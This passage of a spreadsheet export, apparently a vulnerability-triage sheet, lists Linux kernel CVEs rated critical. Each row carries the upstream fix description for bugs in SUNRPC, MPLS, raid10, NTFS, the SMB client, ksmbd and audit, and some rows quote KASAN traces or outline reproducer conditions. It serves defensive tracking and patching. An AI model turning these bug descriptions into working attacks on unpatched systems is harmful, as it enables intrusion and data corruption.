          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr"/>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: xdr_buf_trim: clamp buf-&gt;len to avoid underflow
xdr_buf_trim() trims `len` bytes from the tail of an xdr_buf by
walking the tail, pages, and head iovecs.  Each per-section step
uses min_t() so it never removes more bytes than that section
holds, but the final accounting at the fix_len label subtracts the
total bytes actually consumed from buf-&gt;len without any clamp:
    fix_len:
            buf-&gt;len -= (len - trim);
When the caller has set buf-&gt;len to a value smaller than the sum
of the iov_lens, (len - trim) can exceed buf-&gt;len and the unsigned
subtraction wraps to near UINT_MAX.  gss_krb5_unwrap_v2() reaches
xdr_buf_trim() in exactly that state:
    buf-&gt;head[0].iov_len -= GSS_KRB5_TOK_HDR_LEN + headskip;
    buf-&gt;len = len - (GSS_KRB5_TOK_HDR_LEN + headskip);
    xdr_buf_trim(buf, ec + GSS_KRB5_TOK_HDR_LEN + tailskip);
buf-&gt;len is a small wire-derived value while the iov_lens are at
page scale, so the per-section loops legitimately consume far more
bytes than buf-&gt;len records.  The wrapped buf-&gt;len then propagates
as the authoritative stream bound into every downstream XDR
decoder.
Fix by clamping the decrement so buf-&gt;len bottoms out at zero:
    buf-&gt;len -= min_t(unsigned int, buf-&gt;len, len - trim);
On the normal path where the iov_lens sum to buf-&gt;len, (len - trim)
is always &lt;= buf-&gt;len and the result is identical to before.  No
callers change behavior outside the underflow case.</t>
        </is>
      </c>
      <c r="S61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89551</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89555</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr"/>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mpls: reload header after pskb_may_pull()
mpls_select_multipath() calls mpls_multipath_hash() to choose a nexthop
when an MPLS route has multiple nexthops.  While walking the MPLS label
stack, the hash routine caches hdr for the current label.  After finding
the bottom-of-stack label, it calls pskb_may_pull() before reading the
inner IP header.
If an skb is constructed with the inner IP header in nonlinear data and
insufficient tailroom in the linear head, pskb_may_pull() calls
pskb_expand_head() to replace the skb head and free the old one.  This
leaves hdr pointing to freed memory.  The IPv6 path can invalidate hdr
again when it performs a second pull for the larger header.
The issue was found through static analysis.  A reproducer sending a legal
Geneve packet through a bareudp/MPLS multipath setup triggered the same
KASAN report in 2 of 2 unpatched runs:
  BUG: KASAN: slab-use-after-free in mpls_select_multipath
  Read of size 1 at addr ffff88800ecc6e20 by task ksoftirqd/1/23
  Call Trace:
   mpls_select_multipath
   mpls_forward
   __netif_receive_skb_list_core
   netif_receive_skb_list_internal
   napi_complete_done
   gro_cell_poll
   __napi_poll
   net_rx_action
  Freed by task 23:
   kfree
   pskb_expand_head
   __pskb_pull_tail
   mpls_select_multipath
Reload hdr from the current skb head after each successful pull before
deriving the inner IPv4 or IPv6 header pointer.</t>
        </is>
      </c>
      <c r="S62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89555</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89558</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr"/>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/raid10: fix still_degraded being inverted in raid10_sync_request()
Commit fe6a19d40ceb ("md/md-bitmap: merge md_bitmap_start_sync() into
bitmap_operations") converted still_degraded from int to bool, but
inverted the assignment in the loop that checks whether the array will
still be degraded after the current device is recovered:
"still_degraded = 1" became "still_degraded = false".
As a result, recovering a device while another mirror is still missing
calls md_bitmap_start_sync() with degraded == false, which clears bitmap
bits that the still-missing device needs.  When that device is re-added,
its bitmap-based recovery finds the bits already cleared and skips every
region written while the array was degraded, so it is marked In_sync
while holding stale data: silent corruption.
Reproducer (raid10 near=2, 4 disks, internal bitmap):
 - fail and remove one disk of each mirror pair
 - write to the degraded array
 - re-add both disks and let recovery finish
 - "check" reports mismatch_cnt=262272 after 256 MiB of degraded
   writes and file contents differ; the second disk's "recovery"
   completes in milliseconds because everything is skipped
The same conversion in raid1 got it right (still_degraded = true).
Restore the correct value.</t>
        </is>
      </c>
      <c r="S63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89558</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89610</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr"/>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: verify run length exceeding volume boundary
The mapping pairs decoder validates that the starting LCN is within the
volume but does not check if the run extends beyond the volume boundary.
A malformed NTFS image with a crafted mapping pairs array could cause
the kernel to access memory beyond the volume boundary, potentially leading
to memory corruption and privilege escalation.
Add validation to ensure lcn + length stays within nr_clusters.</t>
        </is>
      </c>
      <c r="S64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89610</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89611</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr"/>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: validate non-resident attribute offsets
ntfs_attr_update_meta() shifts the attribute name when converting between
non-sparse and sparse attributes. Converting to sparse also adds the
compressed_size field before the name and mapping pairs, requiring eight
additional bytes in the attribute record.
However, the validator does not check that name_offset is within safe
boundaries for these operations or that the additional space is available.
A malicious MFT record could set name_offset such that:
1. The name is positioned at the very end of a non-sparse attribute.
   Converting to sparse would shift the name forward by 8 bytes,
   writing beyond the attribute boundary.
2. The name overlaps with the mapping pairs, causing corruption during
   conversion.
Add validation to ensure:
- For named attributes, name_offset is within valid bounds
- Name does not extend beyond the attribute or overlap with mapping pairs
- For non-sparse, non-compressed attributes, eight bytes are available
  after mapping_pairs_offset for the compressed_size field
The space check also covers unnamed attributes, for which name_offset = 0
is valid and no name range needs to be checked.</t>
        </is>
      </c>
      <c r="S65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89611</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89612</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr"/>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: reject invalid MFT LCNs from boot sector
The NTFS boot sector stores the MFT and MFTMirr locations as unsigned
64-bit LCNs, but parse_ntfs_boot_sector() decoded them into an s64.
A crafted high-bit value could therefore become negative and pass
the existing upper-bound check. The invalid value then propagated into
the MFT zone allocator and could result in an out-of-bounds access to
lcn_empty_bits_per_page.</t>
        </is>
      </c>
      <c r="S66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89612</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89613</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr"/>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: reject invalid empty mapping pairs
Reject an attribute with empty mapping pairs if it has inconsistent
highest VCN and size.</t>
        </is>
      </c>
      <c r="S67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89613</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89614</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr"/>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ntfs: bound the free-cluster bitmap scan to the volume
vol-&gt;lcn_empty_bits_per_page is sized from vol-&gt;nr_clusters at mount, but
ntfs_cluster_alloc() bounds its scan of that array by the size of $Bitmap.
Those are independent on-disk quantities and the mount-time check only
rejects a $Bitmap that is too small, so an image whose $Bitmap covers more
clusters than the volume has lets the scan index past the array.  A run
whose LCN lies in that gap takes the allocator straight there, since the
caller passes the file's own last LCN as its locality hint.  KASAN reports
a slab out-of-bounds read when a file on such a volume is extended.
Clamp the scan to what that array covers, mirroring the max_index
calculation the mount-time scan already uses, and reject a decoded LCN
at or beyond nr_clusters in the mapping pairs decoder.  Conforming
volumes are unaffected.</t>
        </is>
      </c>
      <c r="S68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89614</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89633</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr"/>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix OOB read/write from unvalidated DataOffset in coalesce_t2()
coalesce_t2() computes data pointers directly from server-supplied
DataOffset fields with no validation against buffer bounds:
  data_area_of_tgt = (char *)&amp;pSMBt-&gt;hdr.Protocol +
                     get_unaligned_le16(&amp;pSMBt-&gt;t2_rsp.DataOffset);
  data_area_of_src = (char *)&amp;pSMBs-&gt;hdr.Protocol +
                     get_unaligned_le16(&amp;pSMBs-&gt;t2_rsp.DataOffset);
  data_area_of_tgt += total_in_tgt;
  ...
  memcpy(data_area_of_tgt, data_area_of_src, total_in_src);
A small DataOffset can push a pointer below the actual byte area,
overwriting header fields; a large one can push it past the buffer
end, causing out-of-bounds heap reads (source) or writes (target).
The BCC overflow guard does not prevent this: BCC reflects how much
data is present, while DataOffset controls where in the buffer it
starts.
The "validate target area" comment present since the function was
first written in 2005 was a placeholder that was never implemented.
Add lower- and upper-bound checks for both data pointers before the
memcpy, and before any target header fields are modified.</t>
        </is>
      </c>
      <c r="S69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89633</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89635</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr"/>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: only rebind the reopened file's own oplock on durable reconnect
ksmbd_reopen_durable_fd() walks the inode's m_op_list and rebinds every
detached oplock to the reconnecting session:
	list_for_each_entry_rcu(op, &amp;ci-&gt;m_op_list, op_entry,
				lockdep_is_held(&amp;ci-&gt;m_lock)) {
		if (op-&gt;conn)
			continue;
		op-&gt;conn = ksmbd_conn_get(fp-&gt;conn);
		op-&gt;sess = work-&gt;sess;
	}
The only key is op-&gt;conn == NULL, which every detached durable handle on
that inode matches, not just the one owned by fp.  When two sessions hold
durable handles on the same file and both disconnect, reconnecting one of
them adopts the other session's oplock: op-&gt;sess is overwritten with the
reconnecting session without taking a reference on it, while op-&gt;conn
pins the connection.
The sibling teardown path, session_fd_check(), keys on the identity of
the connection being torn down (op-&gt;conn == conn) rather than on shared
state, and so does not have this problem.
Once the adopting session is destroyed, ksmbd_session_destroy() frees it
while the foreign oplock still points at it.  The reader in
ksmbd_close_fd_app_instance_id() validates only opinfo-&gt;conn, which is
still live thanks to the reference taken above, and then dereferences the
stale session:
	if (!opinfo-&gt;conn) {
		up_read(&amp;fp-&gt;f_ci-&gt;m_lock);
		goto out;
	}
	ft = &amp;opinfo-&gt;sess-&gt;file_table;
	write_lock(&amp;ft-&gt;lock);
  BUG: KASAN: slab-use-after-free in _raw_write_lock+0x74/0xd0
  Write of size 4 at addr ffff88810a970528 by task kworker/0:0/9
  Workqueue: ksmbd-io handle_ksmbd_work
  Call Trace:
   _raw_write_lock+0x74/0xd0
   ksmbd_close_fd_app_instance_id+0x183/0x410
   smb2_open+0x1346/0x4430
   handle_ksmbd_work+0x2bb/0x7b0
Reached from an authenticated session against a share with the default
durable-handle and oplock configuration: two sessions open the same file
with a durable-v2 handle and an RH lease under distinct AppInstanceIds,
both log off, one reconnects with DH2C, and a later durable-v2 create
carrying the other AppInstanceId walks into the freed session.
Constrain the loop to the oplock owned by the file being reopened.</t>
        </is>
      </c>
      <c r="S70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89635</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89636</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr"/>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: clear ce-&gt;tgthint in free_tgts()
When free_tgts() frees all structures in ce-&gt;tlist, ce-&gt;tgthint
is left pointing to one of the freed cache_dfs_tgt structures.
If ce-&gt;tgthint is not reset before it is used later, it results
in a use-after-free.
Set ce-&gt;tgthint to NULL in free_tgts() after the elements are
freed to reflect that no elements remain.</t>
        </is>
      </c>
      <c r="S71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89636</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89637</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr"/>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix UAF and buffer leak in cifs_check_trans2() for malformed secondary T2
When a valid primary TRANSACT2 response has been received (mid-&gt;resp_buf
set, mid-&gt;multiRsp true) and a subsequent secondary response causes
cifs_check_trans2() to return false -- either because the SMB header is
invalid (malformed != 0) or because check2ndT2() rejects the PDU --
handle_mid() overwrites mid-&gt;resp_buf with the new buffer (leaking the
primary buffer) and, because mid-&gt;multiRsp is set, skips the
server-&gt;smallbuf/bigbuf NULL-out.  When the user thread frees
mid-&gt;resp_buf, server-&gt;smallbuf or server-&gt;bigbuf is left dangling; the
demux thread reuses it for the next packet, resulting in a use-after-free.
Combine both early-exit conditions and, when mid-&gt;multiRsp is already
set, abort the pending transaction inline: set multiEnd, call
dequeue_mid() with malformed=true, and return true so handle_mid() exits
without touching mid-&gt;resp_buf or the server buffer pointers.</t>
        </is>
      </c>
      <c r="S72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89637</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89643</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr"/>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
audit: avoid dropping live tree ref on fsnotify rule autoremove
audit_del_rule() is used for both netlink deletion templates and internal
fsnotify autoremove.  The former passes a parsed template which owns a
temporary tree reference; the latter passes the installed entry itself.
The unconditional audit_put_tree() at the end of audit_del_rule() assumes
the template case.  For mixed AUDIT_DIR plus AUDIT_EXE rules, an fsnotify
autoremove event therefore drops the installed rule's live tree reference.
Repeating this across rules sharing the same tree can free the tree while
another rule still references it, and a later autoremove dereferences the
freed pathname while comparing rules.
Move the temporary-tree put to audit_rule_change(), the caller that owns
deletion templates.  Keep it in the AUDIT_DEL_RULE cleanup so both
successful deletion and -ENOENT still release the parser-owned tree.
[PM: dropped unnecessary comment for line length reasons]</t>
        </is>
      </c>
      <c r="S73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89643</t>
        </is>
      </c>
    </row>
    <row r="74">
